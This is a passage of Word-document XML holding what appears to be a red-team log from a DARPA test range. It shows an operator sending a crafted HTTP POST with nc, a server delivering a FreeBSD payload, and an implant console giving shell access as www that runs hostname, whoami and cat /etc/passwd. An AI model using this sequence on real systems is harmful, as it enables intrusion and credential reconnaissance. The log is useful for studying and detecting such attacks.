      <w:r>
        <w:t>ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FD701" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/stage1_cadets/http_post# cat http_post_ca51 | nc 128.55.12.51 80 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7F702" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/1.1 403 Forbidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C0A06" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server: nginx/1.14.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F98395" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Date: Fri, 17 May 2019 14:47:39 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939F19F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Content-Type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF762C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394B24D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88F756" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>X-Powered-By: PHP/7.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13855D09" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4EDDFC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A703D5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Access denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4AE2D0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FEC16A2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2D3338" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1412DA9E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for /index.html?q=FX64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325988C3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.167 - - [17/May/2019 10:47:42] "GET /index.html?q=FX64 HTTP/1.0" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE05E82" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS:F ARCH:X64 looking up "FX64" in payloads..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D966782" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>finalizing headers, specifically Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DCE9B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>writing 0x27FC0 (163776) bytes of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBC4C3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48782603" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44570B45" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [freebsd] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A582929" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new freebsd console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032FF499" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [F2] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C737DE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B738E3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E22E6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 1361s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5DA181" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F2         128.55.12.51:35518 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:47:39 2019        active 21s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6209A46F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_ut1uqr4o8pnp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="214"/>
      <w:r>
        <w:t>ta1-cadets-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F6169C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE21CF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3D274" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD4DDC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-cadets-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400C0B9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE3DD8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 80 www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC749A2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01608E3E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>11:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D9173" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;cd /etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501DA13" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F2&gt;cat passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317BC22" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # $FreeBSD$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309924CB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E253B50" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root:*:0:0:Charlie &amp;:/root:/bin/csh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75615569" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>toor:*:0:0:Bourne-again Superuser:/root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321685F8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E596E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>operator:*:2:5:System &amp;:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18599EBD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B80F7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFF686F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5648F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6239C8A7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>news:*:8:8:News Subsystem:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD38CDA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF6D66" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4B29B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4864A1E6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A3DA3B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F7F5EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA285E7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7AB9C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F5E75" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68577FB9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBD882" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3E008B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A79E27" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046B06DA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ntpd:*:123:123:NTP Daemon:/var/db/ntp:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F29404" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D25277C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05688536" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB0ED5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>darpa:*:1001:1001:DARPA:/home/darpa:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04CD48" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bbn:*:1002:1002:bbn:/home/bbn:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15441D13" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711C142D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EFDFA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A254EF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A12AFD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>polkitd:*:565:565:Polkit Daemon User:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB27C5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>colord:*:970:970:colord color management daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D316DC8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>git_daemon:*:964:964:git daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D7ADB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kafka:*:234:234:Apache Kafka user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536EFE4C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E822C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pgsql:*:70:70:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0174C6A7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta3:*:1003:1003:TA3 User,None,None,None:/home/ta3:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F5A106" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta1:*:1004:1004:TA1 User,None,None,None:/home/ta1:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252F5167" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin:*:1005:1005:Admin,None,None,None:/home/admin:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2352A2ED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>user:*:1006:1006:User,None,None,None:/home/user:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34413504" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>iswitcher:*:1007:1007:Internet Switcher Service,None,None,None:/home/iswitcher:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449BA8E7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AB8694" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>15:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29569B62" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A93BA3E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105CCCD8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        A1        128.55.12.166:49789 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 11:51:30 2019        active 414s</w:t>
      </w:r>
    </w:p>
